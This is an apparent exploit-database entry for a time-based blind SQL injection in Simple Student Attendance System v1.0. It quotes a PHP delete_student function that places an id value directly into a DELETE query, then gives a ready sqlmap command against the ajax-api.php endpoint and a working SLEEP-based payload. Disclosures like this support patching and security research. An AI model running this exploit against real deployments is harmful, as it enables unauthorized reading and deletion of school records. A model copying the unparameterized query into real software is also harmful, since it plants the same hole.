Simple student attendance system v1.0 time based blind sql injection Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2024-03-03 | Type : remote | Platform : php
This exploit / vulnerability Simple student attendance system v1.0 time based blind sql injection is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: Simple Student Attendance System - Time Based Blind SQL Injection
# Date: 26 December 2023
# Exploit Author: Gnanaraj Mauviel (@0xm3m)
# Vendor: oretnom23
# Vendor Homepage:
# Software Link:
# Version: v1.0
# Tested on: Mac OSX, XAMPP, Apache, MySQL


Source Code(/php-attendance/classes/actions.class.php):

public function delete_student(){
$delete = $this->conn->query("DELETE FROM `students_tbl` where `id` = '{$id}'");
$_SESSION['flashdata'] = [ 'type' => 'success', 'msg' => "Student has been deleted successfully!" ];
return [ "status" => "success" ];
$_SESSION['flashdata'] = [ 'type' => 'danger', 'msg' => "Student has failed to deleted due to unknown reason!" ];
return [ "status" => "error", "Student has failed to deleted!" ];

-> sqlmap -u "http://localhost/php-attendance/ajax-api.php?action=delete_student" --data="id=7" --technique=T --batch
Parameter: id (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=7' AND (SELECT 3738 FROM (SELECT(SLEEP(5)))kVAW) AND 'vAFW'='vAFW